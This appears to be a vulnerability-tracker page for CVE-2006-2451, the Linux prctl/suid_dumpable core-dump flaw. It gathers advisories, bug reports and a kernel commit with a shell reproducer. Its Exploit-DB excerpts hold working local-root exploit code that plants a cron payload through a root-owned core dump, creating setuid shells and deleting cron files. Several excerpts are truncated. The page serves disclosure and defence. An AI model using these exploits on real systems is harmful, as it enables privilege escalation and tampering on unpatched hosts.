CVE-2006-2451
published 2006-07-07CVE-2006-2451: The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service…
PriorityP421medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
4.39%
90.1th percentile
The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.
Affected
50 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
vendor_ubuntu4.7MEDIUM
vendor_redhat4.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2006-07-11·CVSS 4.7
CVE-2006-0039 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
A race condition was discovered in the do_add_counters() functions.
Processes which do not run with full root privileges, but have the
CAP_NET_ADMIN capability can exploit this to crash the machine or read
a random piece of kernel memory. In Ubuntu there are no packages that
are affected by this, so this can only be an issue for you if you use
third-party software that uses Linux capabilities. (CVE-2006-0039)
John Stultz discovered a faulty BUG_ON trigger in the handling of
POSIX timers. A local attacker could exploit this to trigger a kernel
oops and crash the machine. (CVE-2006-2445)
Dave Jones discovered that the PowerPC kernel did not perform certain
required access_ok() checks. A local user could exploit thi
Red Hat
Possible privilege escalation through prctl() and suid_dumpable
vendor_redhat·2006-07-06·CVSS 4.6
CVE-2006-2451 [MEDIUM] Possible privilege escalation through prctl() and suid_dumpable
Possible privilege escalation through prctl() and suid_dumpable
The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.
GHSA
GHSA-347h-x86q-mrvf: The suid_dumpable support in Linux kernel 2
ghsa_unreviewed·2022-05-01
CVE-2006-2451 [MEDIUM] GHSA-347h-x86q-mrvf: The suid_dumpable support in Linux kernel 2
The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.
Kernel
fs: make dumpable=2 require fully qualified path
kernel_security·2012-07-30·CVSS 4.6
CVE-2006-2451 [MEDIUM] fs: make dumpable=2 require fully qualified path
fs: make dumpable=2 require fully qualified path
When the suid_dumpable sysctl is set to "2", and there is no core dump
pipe defined in the core_pattern sysctl, a local user can cause core files
to be written to root-writable directories, potentially with
user-controlled content.
This means an admin can unknowningly reintroduce a variation of
CVE-2006-2451, allowing local users to gain root privileges.
$ cat /proc/sys/fs/suid_dumpable
2
$ cat /proc/sys/kernel/core_pattern
core
$ ulimit -c unlimited
$ cd /
$ ls -l core
ls: cannot access core: No such file or directory
$ touch core
touch: cannot touch `core': Permission denied
$ OHAI="evil-string-here" ping localhost >/dev/null 2>&1 &
$ pid=$!
$ sleep 1
$ kill -SEGV $pid
$ ls -l core
-rw------- 1 root kees 458752 Jun 21 11:35 core
$ sudo
No detection rules found.
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
exploitdb·2006-07-18·CVSS 4.6
CVE-2006-2451 [MEDIUM] Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
Linux Kernel 2.6.13
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451).
*
* This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)
exploitdb·2006-07-14
CVE-2006-2451 Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)
Linux Kernel 2.6.13 /tmp/getsuid.c
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsui
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)
exploitdb·2006-07-13·CVSS 4.6
CVE-2006-2451 [MEDIUM] Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)
Linux Kernel 2.6.13
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451).
*
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
*
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
*
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different c
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)
exploitdb·2006-07-12
CVE-2006-2451 Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)
Linux Kernel 2.6.13 = 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s &
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
exploitdb·2006-07-11·CVSS 4.6
CVE-2006-2451 [MEDIUM] Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
Linux Kernel 2.6.13 = 2.6.13 && (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork()
Bugzilla
Various kernel security issues - July thru October 2006
bugzilla·2006-07-24·CVSS 4.9
[MEDIUM] Various kernel security issues - July thru October 2006
Various kernel security issues - July thru October 2006
This bug will track the various kernel issues up to July 2006.
Discussion:
*** Bug 188935 has been marked as a duplicate of this bug. ***
---
*** Bug 190082 has been marked as a duplicate of this bug. ***
---
*** Bug 190083 has been marked as a duplicate of this bug. ***
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Here are updated kernel packages to QA for FC3:
* Sun Jul 16 2006 Marc Deslauriers
2.6.12-2.4.legacy_FC3
- - Added patches for:
CVE-2005-3359 (incorrect inrement/decrement in atm module)
CVE-2006-0555 (nfs: fix client panic using O_DIRECT)
CVE-2006-0741 (fix for ELF exec vulnerability on EM64T)
CVE-2006-0744 (fix for ELF exec vulnerability on EM64T)
CVE-2006-1525 (panic in ip_route_input() via inet_rtm_getro
Bugzilla
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
bugzilla·2006-07-15·CVSS 4.6
CVE-2006-2451 [MEDIUM] CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
I've just reproduced this issue under kernel-2.6.17-1.2145 on FC-5 and
kernel-2.6.17-1.2364 on FC-6 - see bug 198893 for a nasty reproducer.
I suggest that we apply the patch to prevent processes with the
PR_SET_DUMPABLE flag set from being able to dump core in whatever
directory they can cd into, regardless of whether the userid has
write permission, ASAP.
Discussion:
fixed in 2158 for FC5
fixed in rawhide too some time after 2364.
Bugzilla
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
bugzilla·2006-06-19·CVSS 4.6
CVE-2006-2451 [MEDIUM] CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
The prctl() function allows to set the value 2 for PR_SET_DUMPABLE by
unprivileged processes. In case of a segmentation fault the core dump will then
be owned by the user root.
This could lead to a denial of service (disk consumption) or allow a local user
to gain root privileges.
The suid_dumpable support and prctl(PR_SET_DUMPABLE, 2) have been added with the
2.6.13 kernel and Red Hat Enterprise Linux 4 contains a backport of it.
Discussion:
The patch for the stable kernel series of 2.6.17 can be found here:
http://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.17.y.git;a=commit;h=0af184bb9f80edfbb94de46cb52e9592e5a547b0
---
An advisory has been issued which should help the problem
described in
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=195902http://secunia.com/advisories/20953http://secunia.com/advisories/20960http://secunia.com/advisories/20965http://secunia.com/advisories/20986http://secunia.com/advisories/20991http://secunia.com/advisories/21179http://secunia.com/advisories/21498http://secunia.com/advisories/21966http://securitytracker.com/id?1016451http://support.avaya.com/elmodocs2/security/ASA-2006-162.htmhttp://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.17.y.git%3Ba=commit%3Bh=0af184bb9f80edfbb94de46cb52e9592e5a547b0http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.24http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.4http://www.novell.com/linux/security/advisories/2006_16_sr.htmlhttp://www.novell.com/linux/security/advisories/2006_17_sr.htmlhttp://www.novell.com/linux/security/advisories/2006_42_kernel.htmlhttp://www.novell.com/linux/security/advisories/2006_47_kernel.htmlhttp://www.novell.com/linux/security/advisories/2006_49_kernel.htmlhttp://www.osvdb.org/27030http://www.redhat.com/support/errata/RHSA-2006-0574.htmlhttp://www.securityfocus.com/archive/1/439483/100/100/threadedhttp://www.securityfocus.com/archive/1/439610/100/100/threadedhttp://www.securityfocus.com/archive/1/439869/100/0/threadedhttp://www.securityfocus.com/archive/1/440057/100/0/threadedhttp://www.securityfocus.com/archive/1/440117/100/0/threadedhttp://www.securityfocus.com/archive/1/440118/100/0/threadedhttp://www.securityfocus.com/archive/1/440379/100/0/threadedhttp://www.securityfocus.com/bid/18874http://www.ubuntu.com/usn/usn-311-1http://www.vupen.com/english/advisories/2006/2699https://issues.rpath.com/browse/RPL-488https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11336http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=195902http://secunia.com/advisories/20953http://secunia.com/advisories/20960http://secunia.com/advisories/20965http://secunia.com/advisories/20986http://secunia.com/advisories/20991http://secunia.com/advisories/21179http://secunia.com/advisories/21498http://secunia.com/advisories/21966http://securitytracker.com/id?1016451http://support.avaya.com/elmodocs2/security/ASA-2006-162.htmhttp://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.17.y.git%3Ba=commit%3Bh=0af184bb9f80edfbb94de46cb52e9592e5a547b0http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.24http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.4http://www.novell.com/linux/security/advisories/2006_16_sr.htmlhttp://www.novell.com/linux/security/advisories/2006_17_sr.htmlhttp://www.novell.com/linux/security/advisories/2006_42_kernel.htmlhttp://www.novell.com/linux/security/advisories/2006_47_kernel.htmlhttp://www.novell.com/linux/security/advisories/2006_49_kernel.htmlhttp://www.osvdb.org/27030http://www.redhat.com/support/errata/RHSA-2006-0574.htmlhttp://www.securityfocus.com/archive/1/439483/100/100/threadedhttp://www.securityfocus.com/archive/1/439610/100/100/threadedhttp://www.securityfocus.com/archive/1/439869/100/0/threadedhttp://www.securityfocus.com/archive/1/440057/100/0/threadedhttp://www.securityfocus.com/archive/1/440117/100/0/threadedhttp://www.securityfocus.com/archive/1/440118/100/0/threadedhttp://www.securityfocus.com/archive/1/440379/100/0/threadedhttp://www.securityfocus.com/bid/18874http://www.ubuntu.com/usn/usn-311-1http://www.vupen.com/english/advisories/2006/2699https://issues.rpath.com/browse/RPL-488https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11336
2006-07-07
Published